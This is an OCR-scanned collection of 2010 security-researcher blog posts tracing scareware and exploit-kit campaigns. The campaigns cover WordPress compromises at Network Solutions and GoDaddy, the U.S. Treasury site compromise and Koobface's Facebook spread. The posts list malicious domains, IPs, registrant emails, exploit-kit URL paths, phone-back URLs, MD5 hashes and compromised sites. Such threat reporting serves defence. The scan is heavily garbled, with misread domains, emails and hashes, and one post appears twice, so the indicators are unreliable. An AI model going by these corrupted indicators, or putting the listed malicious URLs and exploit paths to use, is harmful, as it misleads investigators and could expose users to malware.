nsl.letme-guardyourzone. com 

nsl.letprotectsystem.net 

nsl. my-softprotect4. net 

nsl.new-pc-protection.com 

nsl.payment-safety.net 


nsl. romsinkord. com 


nsl.safelinkhere. net 


nsl.safetyearth.net 

nsl.safetypayments.net 
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nsl.sa ve-secure. com 
nsl.search4 vir. net 
nsl.systemmdefender. com 
nsl. upscanyourpc-no w. com 

Parked on 93.174.92.225 , [7JAS29073, ECATEL-AS , Ecatel 
Network (ns2.safelinkhere.net) are also: 

marmarams. com 

ns2. cleanupantivirus. com 

ns2. dodtorsans. net 

ns 2. fastsearch-protection.com 

ns2.go-searchandscan.net 

ns2.guardsystem-scanner.net 

ns2.hot-cleanofyourpc.com 

ns2. marfilks. net 

ns2. my-systemprotection.net 

ns 2. myprotected-system. com 



ns2.myprotection-zone.net 
ns2. mysystem protection, com 
ns2. ne w-system protection, com 
ns2. ne wsystem-guard. com 
ns2. onguard-zone. net 
ns2.pcregrtuy. net 
ns2.piotguardto-mypc. com 
ns2.protected-field. com 
ns2.safelinkhere. net 
ns2.scanmypc-online. com 
ns2.search-systemprotect.net 
ns2.searchscan-online.net 
ns2.securemyzone. com 
ns2.systemcec7. com 
ns2. trust-systemprotect.net 
ns2. trustscan-onmyzone. com 
ns2. trustsystemguard. net 
ns2. upscanyour-pcno w. com 
ns2. windows-systemshield.net 
ns2. windows-virusscan.com 



ns 2. windowsadditionalguard. net 
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Following last week's Network Solutions mass compromise of 
Word Press blogs ([8]Dissecting the WordPress Blogs 

Compromise at Network Solutions), over the weekend a 
similar incident took place Go Daddy, [9]according to 
WPSecurityLock. 

Since the campaign's URLs still active, and given the fact 
that based on historical OS I NT, we can get even 

more insights into known operations of cybercriminals 
profiled before ( one of the key domains used in the 
campaign 

is registered to hiiarykneber@yahoo.com. Yes, that 
Hilary Kneber.), it's time to connect the dots. 

• Related Hilary Kneber posts: [lOJThe Kneber botnet - 
FAQ; [11 JCelebrity-Themed Sea re ware Campaign 
Abusing DocStoc; [12]Dissecting an Ongoing Money 
Mule Recruitment Campaign; [13]Keeping Money Mule 
Recruiters on a Short Leash - Part Four 

One of the domains used cechirecom.com/js.php - 
61.4.82.212 - Email: lee _gerstein@yahoo.co.uk was 
redirecting to www3.sdfhj40-td.xorg.pl?p= - 
95.169.186.25 and from there to 

www2.burnvirusnow34.xorg.pl?p= - 217.23.5.51. 
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The front page of the currently not responding 
cechirecom.com was returning the following message: 

• " Welcome. Site will be open shortly. Signup, question or 
abuse please send to iarisadoiina@yahoo.com" 

Registered with the same email, larisadolina@yahoo.com, is 
also another domain known have been used in similar 

attacks from February, 2010 - iss9w8s89xx.org. 

Parked on 217.23.5.51 are related sea reware domains part of 
the campaign: 

www2.burn virusno w31 .xorg.pl 

www2.burn virusno w33.xorg.pl 

www2.burn virusno w34.xorg.pl 

www2.trueguardscaner30-p.xorg.pl 

www2.trueguardscaner33-p.xorg.pl 

wwwl. sa vesysops30p.xorg.pl 

wwwl.suaguardprotectllp.xorg.pl 

www2.realsafepc32p.xorg.pl 

wwwl.suaguardprotectl3p.xorg.pl 

wwwl.suaguardprotectl4p.xorg.pl 

Detection rate for the scareware: 

- packupdate_buildl07_2045.exe - [14]VirusDoctor; 
Mal/FakeAV-BW - Result: 14/41 (34.15 %) with the sample 
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phoning back to the following URLs: 

- upda te2. sa vecompno w. com/index.php ? 
controller=hash - 91.207.192.25 - Email: 
gkook@checkjemail. nl 

- upda te2.sa vecompno w. com/index.php ? 
controller microinstaller 

- upda tel.sa vecompno w. com/index.php ? 
controller-microinstaller - 94.228.209.223 - Email: 
gkook@checkjemail.nl The same email was originally seen in 
December 2009' s "[15]A Diverse Portfolio of Fake 
Security Software - 

Part Twenty Four '. Parked on these IPs are also related 
phone back locations: 

Parked on 188.124.7.156: 

savecompnow.com - Email: gkook@checkjemail.nl 
securemyfield.com - Email: gkook@checkjemail.nl 

updatel.securepro.xorg.pl 

Parked on 91.207.192.25: 

update2.savecompnow.com - Email: 
gkook@checkjemaU. nl 

update2.xorg.pl 

update2.winsystemupdates.com - Email: 
gkook@checkjemaU. nl 

report.zoneguardland.net - Email: gkook@checkjemail.nl 


Parked on 94.228.209.223: 


updatel.savecompnow.com - Email: 
gkook@checkjemail. nl 

updatel.winsystemupdates.com 
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Although the cechirecom.com/js.php is not currently 
responding, parked on the same IP 61.4.82.212, is another 
currently active domain, which is registered to 

hiiarykneber@yahoo. com. 

Parked on 61.4.82.212, AS17964, DXTNET Beijing Dian-Xin- 
Tong Network Technologies Co., Ltd.: 

kdjkfjskdfjiskdjf.com - Email: hiiarykneber@yahoo.com 

nsl.stablednsstuff.com - Email: lee 
_gerstein@yahoo. co. uk 

js.ribblestone.com - Email: skeletor71@comcast.net - 
includes a link pointing to panelscansecurity.org/? 
affid=320 

&subid=landing - 91.212.127.19 - Email: 
bobarter@xhotmail. net 

The currently active campaign domain redirection is as 
follows: 

kdjkfjskdfjlskdjf.com/js.php - 61.4.82.212 - Email: 
hilarykneber@yahoo. com 

- www3.sdfhj40-td.xorg.pl?p= 


- wwwl.soptvirus42-pr.xorg.pl?p= - 209.212.149.19 
Parked on 209.212.149.19: 

www2.burn virusno w43.xorg.pl 
www2.trueguardscaner42-p.xorg.pl 
wwwl.suaguardprotect23p.xorg.pl 
www2. realsafepc27p.xorg.pl 
wwwl. fastfullfind27p.xorg.pl 
wwwl.yesitssafe-no w-forsure.in 
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Detection rate for the sea re ware: 

- packupdate build 106 _2045.exe - 

[16]TrojanDownloader:Win32/FakeVimes; High Risk 
Cloaked Malware - Result: 7/41 (17.08 %) 

Just like in Network Solution's case ([17]Dissecting the 
WordPress Blogs Compromise at Network Solutions) 

the end user always has to be protected from himself using 
basic security auditing practices in regard to default 
WordPress installations. The rest is wishful thinking, that the 
end user would self-audit himself. 

It seems that hilarykneber@yahoo.com related activities 
are not going to go away anytime soon. 

Related WordPress security resources: 



[18] 20 Word press Security Plug-ins And Tips To keep Hackers 
Away 

[19] 11 Best Ways to Improve Word Press Security 

[20J20+ Powerful Word press Security Plugins and Some Tips 
and Tricks 

This post has been reproduced from [21]Dancho 
Danchev's blog. Follow him [22Jon Twitter. 

1. http-.//communit y aodaddv com/aodaddv/whats-up-with- 
ao-daddy-wordoress- oh n-exoioits-and-maiware/ 

2 . 

httos://www. virustotal. com/anaiisis/38c96fc7f402772beed9c 

83512da6189cb9b92f7f36fc8a5c8b70f2a6fc4faab-12730 

70694 

3. 

htto: //www. virustotal. com/analisis/d0bba30e43ddc5db394fd 

0c03314d2d2c2743f7f611 cOSWael 5a8d588ffd990-l2 731 

50790 

4. 

htto://www. virustotal. com/analisis/ad643ead6b46c70dba4 74 

1 dd548842eab49d2d7d52637f32 723c0084366b44b3-12 725 

44449 

5. htto://ddanchev.blo as oot.com/2009/12/diverse-portfolio- 
of-fake-securitv. html 



























6. http://ddanchev.blo as oot.com/2010/04/dns-infrastructure- 
of-monev-mule.html 


7. htto://ddanchev.blo as oot.com/2010/04/dns-infrastructure- 
of-monev-mule.html 

8. htto://ddanchev.blo as oot.com/2010/04/dissectin a- 
wordpress-bloas-compromise.html 

9. http://www. wpsecuritvlock. com/cechriecom-com-scri pt- 
wordoress-hacked-on-aodaddv-case-stud v/ 

10. htto://bloas.zdnet.com/securit v/? o=5508 

11. htto.V/ddanchev.blo as oot.com/2009/12/celebritv-themed- 
scareware-camoaian 07.html 

12. htto.V/ddanchev.blo as oot. com/2010/02/dissectin a- 
on aoina-monev-mule.html 

13. htto.V/ddanchev.blo as oot.com/2010/04/keeoina-mone v- 
mule-recruiters-on-short.html 

14. 

htto.V/www. virustotal. com/analisis/dl 0679c06cde2785c4fd88 

41607dd44692b4e2e867c015bfeac29d621a6cebd3-12723 

84002 

15. htto.V/ddanchev.blo as oot. com/2009/12/diverse-oortfolio- 
of-fake-securitv.html 

16. 

htto.V/www. virustotal. com/analisis/efd60f4c444baf2bl 91943 

85 c4 77b0533580aa430eladl d664afb3d389cc9116-12723 


85512 



















































17. http://ddanchev.blo as oot.com/2010/04/dissectin a- 
wordDress-bloas-comDromise.html 


18. http://bloa. taraaana. com/index. oh o/archive/20- 
wordpress-securit v- piua-ins-and-tips-to-keep-hackers-a wa v/ 

19. http://www.probloadesian.com/wordpress/11 -best-wa vs- 
to-impro ve- wordpress-securit v/ 

20. http.V/speckvbov. com/2009/09/22/20-powerful-wordpress- 
securit v- p/uains-and-some-tips-and-tricks/ 

21. http.V/ddanchev.blo as pot.com/ 

22. http://twitter.com/da nchodanchev 
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Summarizing Zero Day's Posts for April (2010-04-29 
14:09) 

The following is a brief summary of all of my posts at 
[1]ZDNet's Zero Day for April, 2010. You [2Jean also go 
through 

[3/previous summaries, as well as subscribe to my 

[4/personal RSS feed, [5/Zero Day's main feed, or follow me 

on 

Twitter: 

Recommended reading: [6]Attack of the Opt-ln Botnets; 
[7/Hundreds of high profile sites unprotected from domain 




































hijacking and [8]Copyright violation alert ransomware in the 
wild 

01. [9]Facebook phishing campaign serving ZeuS crime ware 

02. [lOJResearchers expose complex cyber espionage 
network 

03. [llJCopyright violation alert ransomware in the wild 

04. [12]Do teens hack? Survey says 1 in 6 do 

05. [13]Google: Scareware accounts for 15 percent of all 
malware 

06. [14]New Mac OS X malware variant spotted 

07. [15]Hundreds of high profile sites unprotected from 
domain hijacking 

08. [16]Report: ZeuS crime ware kit, malicious PDFs drive 
growth of cybercrime 

09. [17]Attack of the Opt-ln Botnets 
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10. [18J1.5 million Facebook accounts offered for sale - FAQ 

11. [19]How to remove the iCPP Copyright Violation Alert 
ransomware 
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U.S. Treasury Site Compromise Linked to the 
NetworkSoiutions Mass Word Press Blogs Compromise 

(2010-05-04 22:56) 

UPDATED: Saturday > May 08, 2010: 5 new domains have 
been introduced by the same gang, once again parked at 
217.23.14.14 , AS49981, WorldStream. 

jumpsearches.com - 217.23.14.14 - Email: 
aiexl978a@bigmir.net 

ingeniosearch.net - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

searchnations.com - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

mainssearch.com - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

bigsearchinc.com - 217.23.14.14 - Email: 
alexl978a@bigmir.net 


Sample exploitation structure: 





- jumpsearches.com/bing.com /load.php?spl=mdac 

- jumpsearches.com/bing.com /error.js.php 

- jumpsearches.com/bing.com /pdf.php 
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- jumpsearches.com/bing.com /?spi=2 &br=MSIE 
&vers=7.0 &s= 

- jumpsearches.com/bing.com /load.php?spl=pdf 
2030 

- jumpsearches.com/bing.com /load.php?spl=MS09- 
002 

UPDATED: Thursday, May 06, 2010: The cybercriminals 
behind this ongoing campaign continue introducing 

new domains - ail of which are currently in a cover-up phrase 
pointing to 127.0.0.1 - over the past 24 hours. 

What's particularly interesting, is that all of them reside 
within AS49981, WorldStream = Transit imports = -CAIW-, 
Netherlands. 

- twcorps.com/tv/ - 217.23.14.15 - Email: 
aiexl978a@bigmir.net, Prokopenko Aleksey 

- [ 1 ]MD5: ebcfaa2f595ccea81176f6fl25b31ac7 

- jobsatdoor.com/plain/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 

- [2JMD5: ebcfaa2f595ccea81176f6fl25b31ac7 



- oficla.com/plain/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 

- [3JMD5: ebcfaa2f595ccea81176f6fl25b31ac7 

- organization-b.com/mail/ - 217.23.14.14 - Email: 
aiexl978a@bigmir.net, Prokopenko Aleksey 

- dilingdiling.com/router/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 

All the samples phone back to mazcostrol.com/inst.php? 
aid=blackout now responding to 95.143.193.61, AS49770, 
SERVERCONNECT-AS ServerConnect Sweden AB, from the 
previously known IP 188.124.16.134. 

mazcostrol.com is not just a phone back location. It's also 
actively serving client-side exploits. Sample update obtained 
from the same domain: 

- update4303.exe - [4]Trojan. Win32. VBKrypt - Result: 
5/41 (12.2 %) 

Not surprisingly, AS44565 and AS49770 where 
mazcostrol.com was hosted, are also the home of currently 
ac¬ 
tive ZeuS crime ware C &Cs. 

[5]AS49770 (SERVERCONNECT-AS ServerConnect Sweden 
AB) 

brunongino. com 
sla venkad. com 


frondircass. cn 



pradsuyz.cn 

[6JAS44565 (VITAL VITAL TEKNOLOJI) 

spacebuxer. com 

odboe.info 

212.252.32.69 

jokersimson. net 

whoismak.net 

188.124.7.247 

www.bumagajet.net 

barmatuxa.info 

barmatuxa.net 

UPDATED: A researcher just pinged me with details on 
something that I should be flattered with. Apparently 

grepad.com /in.cgi?4 redirects to 217.23.14.14 /in 
t.php which then [7]redirects to my Blogger profile. 

In fact, 217.23.14.14 the IP of the client-side exploit serving 
domains also redirects there, with the actual campaign in a 
cover-up phrase, with the original domain now responding 
127.0.0.1. 
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Let's see for how long, until then, [8]The Beatles - You 
Know My Name seems to be the appropriate music 


choice. 


[9] AVC and Panda Labs are reporting that the web sites of 

[10] the U.S. Bureau of Engraving and Printing 

(bep.treas.gov; moneyfactory.gov) are serving client-side 
vulnerabilities that ultimately expose the visitor to scareware 

([llJThe Ultimate Guide to Scareware Protection). 

What's particularly interesting about this campaign is that, 
it's part of last month's NetworkSoiutions mass 

WordPress blogs compromise, in the sense that not only is 
the iFrame-d domain registered using the same email as 

the client-side exploits serving domains from the 
NetworkSoiutions campaign - aiexl978a@bigmir.net - but 
also, the dropped scareware's phone back location - 
mazcostrol.com/inst.php?aid=blackout - 188.124.16.134 

- Email: aiexl978a@bigmir.net - is identical to the one used 
in the same campaign, including the affiliate ID used by the 

original cybercriminal. 

The client-side exploit serving domain used in the the U.S 
Treasury site compromise, has also been [12]re- 

ported by a large number of NetworkSoiutions 
customers in the most recent campaign affecting 
WordPress blogs. 

The exploit-serving structure, including the detection rates 
for the dropped scareware and exploits used in the 

U.S Treasury compromise campaign, is as follows: 

- grepad.com /in.cgi?3 - 188.124.16.133, AS44565, VITAL 
TEKNOLOJI - Email: alexl978a@bigmir.net 



- thejustb.com /just/ - 217.23.14.14 (dyndon.com), 

AS49981 - Email: alexl978a@bigmir.net 

- thejustb.com /just/pdf.php 

- thejustb.com /just/1.pdf 

- thejustb.com /just/load.php?spl=javas 

- thejustb.com /just/jl 893d.jar 

- thejustb.com /just/j2 079.jar 

- 1 .pdf - [13]Exploit. PDF-JS. Gen (v) - Result: 1/41 (2.44 %) 

- jl _893d.jar - [14]Trojan-Downioader:Java/Agent.DJDN - 
Result: 5/41 (12.20 %) 

- j2 _079.jar - [15]EXP/Java.CVE-2009-3867.C.2; 
Exploit.Java.Agent.a - Result: 9/41 (21.96 %) 

- grepad.exe - [16]Trojan. Generic. KD. 10339; a variant of 
Win32/lnjector. BNG - Result: 8/41 (19.51 %) 
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Upon successful exploitation the dropped grepad.exe, 
phones back to to mazcostrol.com/inst.php? 
aid=blackout - 

188.124.16.134, AS44565, VITAL TEKNOLOJl - Email: 
alexl978a@bigmir.net, with the same phone back location 
also 

used in the [17]NetworkSoiutions mass compromise 
campaign. 


Known MD5's used by the same campaigner from 
previous campaigns, phoning back to the same 
domain+identical 

affiliate ID: 

MD5=4 734162bb33eff7af7el 8243821 b397e 

MD5=lc9cele5f4c2f3ecl 791554a349bf456 

MD5=dlld76c6ecf6a9a87dcd510294104a66 

MD5=c33750c553e6d6bdc7dac6886f65b51d 

MD5=74cdadfbl5181a997bl5083f033644d0 

MD5=3c7d8cdc73197eddl 76167cd069878bd 

Attempting to interact with the campaign's directories often 
results in a "nice try, idiot." message. Lovely! 

Related posts: 

[18] GoDaddy's Mass Word Press Blogs Compromise Serving 
Sea re ware 

[19] Dissecting the Word Press Blogs Compromise at Network 
Solutions 

This post has been reproduced from [20]Dancho 
Danchev's blog. Follow him [21 Jon Twitter. 

1 . 

htto://www. virustotal. com/analisis/84d634a8c825c089313fal 

036cl be3274f54f3c0964f3602de63352c39cab9cl-12731 
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2 . 
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09615 
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htto://www. virustotal. com/analisis/b2842ala395aa627c30bb 
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5. https://zeustracker.abuse.ch/monitor. ph p?as=49770 
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7. htto://www.blo a aer.com/profile/09989733095447891258 

8. htto://www. youtube.com/watch?v=9DkaRUto3w8 

9. htto://thomoson.bloa.ava.com/2010/05/treasurv-website- 
hacked.html 

10. http.V/pandalabs. pandasecuritv. com/usa-treasur v- 
website-hacked-usina-exploit-kit/ 


11. http://bloas.zdnet. com/securit v/? p=429 7 




































12. httD://bloa.sucuri.net/2010/05/new-infections-todav-at- 
network.html 


13. 

httos://www. virustotal. com/analisis/ed8f5cbe 78fffe7481a 3 3c 
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14. 

https://www. virustotal. com/analisis/50de5fc37f46e868cl ef43 
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17. htto://ddanchev.blo as oot.com/2010/04/dissectin a- 
wordoress-bloas-compromise.html 
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U.S. Treasury Site Compromise Linked to the 
NetworkSolutions Mass WordPress Blogs Compromise 

(2010-05-04 22:56) 

UPDATED: Saturday, May 08, 2010: 5 new domains have 
been introduced by the same gang, once again parked at 
217.23.14.14, AS49981, WorldStream. 

jumpsearches.com - 217.23.14.14 - Email: 
aiexl978a@bigmir.net 

ingeniosearch.net - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

searchnations.com - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

mainssearch.com - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

bigsearchinc.com - 217.23.14.14 - Email: 
alexl978a@bigmir.net 

Sample exploitation structure: 

- jumpsearches.com/bing.com /load.php?spl=mdac 

- jumpsearches.com/bing.com /error.js.php 

- jumpsearches.com/bing.com /pdf.php 
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- jumpsearches.com/bing.com /?spl=2 &br=MSIE 
&vers=7.0 &s= 

- jumpsearches.com/bing.com /load.php?spl=pdf 
2030 

- jumpsearches.com/bing.com /load.php?spl=MS09- 
002 

UPDATED: Thursday, May 06, 2010: The cybercriminals 
behind this ongoing campaign continue introducing 

new domains - ail of which are currently in a cover-up phrase 
pointing to 127.0.0.1 - over the past 24 hours. 

What's particularly interesting, is that all of them reside 
within A549981, WorldStream = Transit imports = -CAIW-, 
Netherlands. 

- twcorps.com/tv/ - 217.23.14.15 - Email: 
aiexl978a@bigmir.net, Prokopenko Aleksey 

- [1JMD5: ebcfaa2f595ccea81176f6fl25b31ac7 

- jobsatdoor.com/plain/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 

- [2JMD5: ebcfaa2f595ccea81176f6fl25b31ac7 

- oficia.com/piain/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 

- [3]MD5: ebcfaa2f595ccea81176f6fl25b31ac7 

- organization-b.com/maii/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 



- dilingdiling.com/router/ - 217.23.14.14 - Email: 
alexl978a@bigmir.net, Prokopenko Aleksey 

AH the samples phone back to mazcostrol.com/inst.php? 
aid=biackout now responding to 95.143.193.61, AS49770, 
SERVERCONNECT-AS ServerConnect Sweden AB, from the 
previously known IP 188.124.16.134. 

mazcostrol.com is not just a phone back location. It's also 
actively serving client-side exploits. Sample update obtained 
from the same domain: 

- update4303.exe - [4]Trojan. Win32. VBKrypt - Result: 
5/41 (12.2 %) 

Not surprisingly, AS44565 and AS49770 where 
mazcostrol.com was hosted, are also the home of currently 
ac¬ 
tive ZeuS crime ware C &Cs. 

[5] AS49770 (SERVERCONNECT-AS ServerConnect Sweden 
AB) 

brunongino. com 
sla venkad. com 
frondircass. cn 
pradsuyz.cn 

[6] AS44565 (VITAL VITAL TEKNOLOJI) 

spacebuxer. com 


odboe.info 



212.252.32.69 


jokersimson. net 

whoismak.net 

188.124.7.247 

www.bumagajet.net 

barmatuxa.info 

barmatuxa.net 

UPDATED: A researcher just pinged me with details on 
something that I should be flattered with. Apparently 

grepad.com /in.cgi?4 redirects to 217.23.14.14 /in 
t.php which then [7]redirects to my Blogger profile. 

In fact, 217.23.14.14 the IP of the client-side exploit serving 
domains also redirects there, with the actual campaign in a 
cover-up phrase, with the original domain now responding 
127.0.0.1. 
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Let's see for how long, until then, [8]The Beatles - You 
Know My Name seems to be the appropriate music 

choice. 

[9]AVC and Panda Labs are reporting that the web sites of 

[lOjthe U.S. Bureau of Engraving and Printing 

(bep.treas.gov; moneyfactory.gov) are serving client-side 
vulnerabilities that ultimately expose the visitor to scareware 

([llJThe Ultimate Guide to Scareware Protection). 


What's particularly interesting about this campaign is that, 
it's part of last month's NetworkSoiutions mass 

Word Press blogs compromise, in the sense that not only is 
the iFrame-d domain registered using the same email as 

the client-side exploits serving domains from the 
NetworkSoiutions campaign - alexl978a@bigmir.net - but 
also, the dropped scareware's phone back location - 
mazcostrol.com/inst.php?aid=blackout -188.124.16.134 

- Email: aiexl978a@bigmir.net - is identical to the one used 
in the same campaign, including the affiliate ID used by the 

original cybercriminal. 

The client-side exploit serving domain used in the the U.S 
Treasury site compromise, has also been [12]re- 

ported by a large number of NetworkSoiutions 
customers in the most recent campaign affecting 
Word Press blogs. 

The exploit-serving structure, including the detection rates 
for the dropped sea reware and exploits used in the 

U.S Treasury compromise campaign, is as follows: 

- grepad.com /in.cgi?3 -188.124.16.133, AS44565, VITAL 
TEKNOLOJI - Email: aiexl978a@bigmir.net 

- thejustb.com /just/ - 217.23.14.14 (dyndon.com), 

AS49981 - Email: aiexl978a@bigmir.net 

- thejustb.com /just/pdf.php 

- thejustb.com /just/1.pdf 

- thejustb.com /just/load.php?spl=javas 



- thejustb.com /just/jl 893d.jar 

- thejustb.com /just/j2 079.jar 

-1 .pdf - [13]Exploit. PDF-JS. Gen (v) - Result: 1/41 (2.44 %) 

- jl _893d.jar - [14]Trojan-Downioader:Java/Agent.DJDN - 
Result: 5/41 (12.20 %) 

- j2 _079.jar - [15]EXP/Java.CVE-2009-3867.C.2; 
Exploit.Java.Agent.a - Result: 9/41 (21.96 %) 

- grepad.exe - [16]Trojan. Generic. KD. 10339; a variant of 
Win32/lnjector.BNG - Result: 8/41 (19.51 %) 
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Upon successful exploitation the dropped grepad.exe, 
phones back to to mazcostrol.com/inst.php? 
aid=blackout - 

188.124.16.134, A544565, VITAL TEKNOLOJI - Email: 
alexl978a@bigmir.net, with the same phone back location 
also 

used in the [17]NetworkSoiutions mass compromise 
campaign. 

Known MD5's used by the same campaigner from 
previous campaigns, phoning back to the same 
domain+identical 

affiliate ID: 

MD5=4 734162bb33eff7af7el 8243821 b397e 


MD5=lc9cele5f4c2f3ecl 791554a349bf456 


MD5=dl Id76c6ecf6a9a87dcd510294104a66 


MD5=c33750c553e6d6bdc7dac6886f65b51d 

MD5=74cdadfbl5181a997bl5083f033644d0 

MD5=3c7d8cdc73197eddl 76167cd069878bd 

Attempting to interact with the campaign's directories often 
results in a "nice try, idiot." message. Lovely! 

Related posts: 

[18] GoDaddy's Mass Word Press Blogs Compromise Serving 
Sea re ware 

[19] Dissecting the Word Press Blogs Compromise at Network 
Solutions 

This post has been reproduced from [20]Dancho 
Danchev's blog. Follow him [21 Jon Twitter. 
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From the Koobface Gang with Scareware Serving 
Compromised Sites (2010-05-08 20:46) 

Following last month's "[IJDissecting Koobface Gang's 
Latest Facebook Spreading Campaign" Koobface gang 
coverage, it's time to summarize some of their botnet 
spreading activities, from the last couple of days. 

Immediately after the suspension of their automatically 
registered Biogspot accounts, the gang once again 

proved that it has contingency plans in place, and started 
pushing links to compromises sites, in a combination with an 
interesting "visual social engineering trick", across Facebook, 
which sadly works pretty well, in the sense that it completely 
undermines the " don't dick on links pointing to unknown 
sites" type of security tips. 

• Recommended reading: [2] 10 things you didn't know 
about the Koobface gang 

The diverse set of activities courtesy of the Koobface gang - 
consider going through the related posts in order to 
understand their underground multitasking mentality beyond 
the Koobface botnet itself - are a case study on the 

abuse of legitimate infrastructure with dean IP/AS 
reputation, for purely malicious purposes. 

This active use of the " trusted reputation chain", just like the 
majority of social engineering centered tactics of the gang, 
aim to exploit the ubiquitous weak link in the face of the 
average Internet user. Here's an example of the most recent 
campaign. 

The spreading of fully working links such as the following 
ones across Facebook: 



face book. com/l/6e 7e5;bit. ly/9QjjSk 
face book. com/l/cdfb;bit. ly/9QjjSk 
face book. com/l/f3c29;bit. ly/9QjjSk 
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(/) 

Traffic 

Clicks Referrers Locations 

Now Past week Past Month Total 
Click<s| 2,601 Since May 01,2010 EST 



aims to trick the infected user's friends, that this is a 
Facebook.com related link. Clicking on this link inside 
Facebook leads to the "Be careful" window showing just the 
bit.ly redirector, to finally redirect to 198.65.28.86/swamt/ 
where a Koobface bogus video has already been seen by 
2,601 users which have already clicked on the link. 

The sea reware redirectors/actual serving domains are parked 
at 195.5.161.126, [3JAS31252, STARNET-AS Star- 


Net Moldova: 




lnasa-test.com - Email: test@now.net.cn 
lonline-test.com - Email: test@now.net.cn 
lwww2scanner.com - Email: test@now.net.cn 
2a-scanner.com - Email: test@now.net.cn 
2nasa-test.com - Email: test@now.net.cn 
2online-test.com - Email: test@now.net.cn 
2www2scanner.com - Email: test@now.net.cn 
3a-scanner.com - Email: test@now.net.cn 
3nasa-test.com - Email: test@now.net.cn 
3oniine-test.com - Email: test@now.net.cn 
3www2scanner.com - Email: test@now.net.cn 
4a-scanner.com - Email: test@now.net.cn 
4check-computer.com - Email: test@now.net.cn 
4nasa-test.com - Email: test@now.net.cn 
4online-test.com - Email: test@now.net.cn 
4www2scanner.com - Email: test@now.net.cn 
5a-scanner.com - Email: test@now.net.cn 
5nasa-test.com - Email: test@now.net.cn 
5online-test.com - Email: test@now.net.cn 
6a-scanner.com - Email: test@now.net.cn 



defence-status6.com - Email: test@now.net.cn 
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defence-status7.com - Email: test@now.net.cn 
mega-scan2.com - Email: test@now.net.cn 
protection-status2.com - Email: test@now.net.cn 
protection-status4.com - Email: test@now.net.cn 
protection-status6.com - Email: test@now.net.cn 
security-statusl.com - Email: test@now.net.cn 
security-status3.com - Email: test@now.net.cn 
security-status4.com - Email: test@now.net.cn 
security-status6.com - Email: test@now.net.cn 
securitystatus7.com - Email: test@now.net.cn 
securitystatus8.com - Email: test@now.net.cn 
securitystatus9.com - Email: test@now.net.cn 






security-status9.com - Email: test@now.net.cn 
Detection rates: 


- setup.exe - [4]Mal/Koobface-E; W32/VBTroj.CXNF - Result: 
7/41 (17.08 %) 

- RunAV_312s2.exe - [5]VirTool. Win32.Obfuscator.hgib (v); 
High Risk Cloaked Malware - Result: 4/41 (9.76 %) The 

sea re ware sample phones back to: 

- windows32-sys.com/download/winlogo.bmp - 

91.213.157.104, AS13618 CAR0NET-A5N - Email: 
contact@pri vacy- 

protect.cn 

- sysdllupdates.com/?b=312s2 - 87.98.134.197, AS16276, 
OVH Paris - Email: contact@privacy-protect.cn 

The complete list of compromised sites distributed by 
Koobface-infected Facebook users: 

02f32e3.netsolhost.com 7o492dc/ 

abskupina.si /cclq/ 

adi-agencement. fr /8r2twm/ 

agilitypower.dk /ko27 

aguasdomondego.com /d5yodi7 

alabasta.homeip.net 7e87 

alankaye.info 72egg/ 
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alpenhaus.com.ar /al5zvf5/ 
animationstjo. fr /5 c/ 
artwork, dray ton. co. uk /k5 wz/ 
beachfishingwa.org.au /u8g98ai/ 
bildtuben.se /I9jg/ 
chalet.se /srb/ 
charlepoeng.be /iOtwbt/ 
christchurchgastonia.org /I hkq/ 
chunkbait.com /gb4i6ak/ 
cityangered.se /besttube/ 
clarkecasa.net /rhk6/ 
clr.dsfm.mb.ca /2964/ 

codeditor. a wardspace. biz /uncensoredciip/ 
coloridellavita.com /sc/ 
cpvs.org /6eobh0n/ 
danieletranchita.com /yourvids/ 
dennis-leah.zzl.org /m95/ 
doctorsorchestra.com /qw/ 
dueciliguria.it /zircu/ 


ediltermo.com /p4zhvj0/ 
emmedici.net /2pg46mk/ 

eurobaustoff.marketing-generator.de /52649an/ 

euskorock.es /p4zm/ 

explicit ft a vour. freeiz. com /qk3r/ 

f9phx. net /s vr/ 

fatucci.it /104s 8 m 2/ 

forwardmarchministries. org /I be/ 

fotoplanet.it /b nog 6s/ 

frenchbean.co. uk /zwr/ 

furius. comoj. com /I azi/ 

geve.be /oj4ex4/ 

gite-maison-pyrenees-luchon. com /jox/ 
googleffffffffa 0ac4d9f. omicronrecords. com /me/ 
gosin.be /ist63z/ 
grimsiovsms.se /cutetube/ 
guest, worldviewproduction.com /m2f/ 
hanssen-racing.com /jl5/ 
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helpbt.com /nqo40uq/ 

helpdroid. omicronrecords, com /7h/ 

hoganjobs.com /jrepsp/ 

holustravel.cz /5j5/ 

hoperidge.com /fitwizy/ 

hottesttomato.com /6b/ 

iglesiabetanial.com /7y7/ 

ihostu. co. uk /jic9v/ 

ilterrazzoalla veneziana.it /4 vxaq5/ 

integra tek. omicronrecords. com /to4u2bd/ 

irisjard.o2switch.net /lb/ 

islandm usicexport. com /hbi2ut9/ 

isteinaudi.it /h2a/ 

johnphelan.com /uynv4/ 

jsacm.com /z6/ 

kabchicago.info /Icgko/ 

katia-paliotti.com /Obaktz/ 

kennethom.net /I20/ 

kleppcc.com /aliendemonstration/ 

klimentglass.cz /vwalp/ 



kvarteretekorren.se /60/ 
lanavabadajoz.com /eg/ 
langstoncorp.com /o2072c/ 
libermann.phpnet.org /madu8p/ 
lineapapel.com /8l20up/ 
longting.nl /6c h/ 
mainteck-fr.com /qjbo5v/ 
majesticdance.com /vlg/ 
mia-niisson.se /cmc/ 
microstart, fr /izul/ 
migdal.org.il /y952eo/ 
mindbodyandsolemt.com /pnbn/ 
musicomm.ca /a5z/ 
nassnig.org /zl/ 
ne weed, org /x41/ 
nosneezes.com /Shjkdjo/ 
nottinghamdowns.com /m7ec/ 
nutman-group.com /92m/ 
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omicronsystems.inc.md /ehoO/ 

on3la.be /bgfhclg/ 

onlineadmin.net /b7uccx/ 

ornskoidskatten.se /mlu/ 

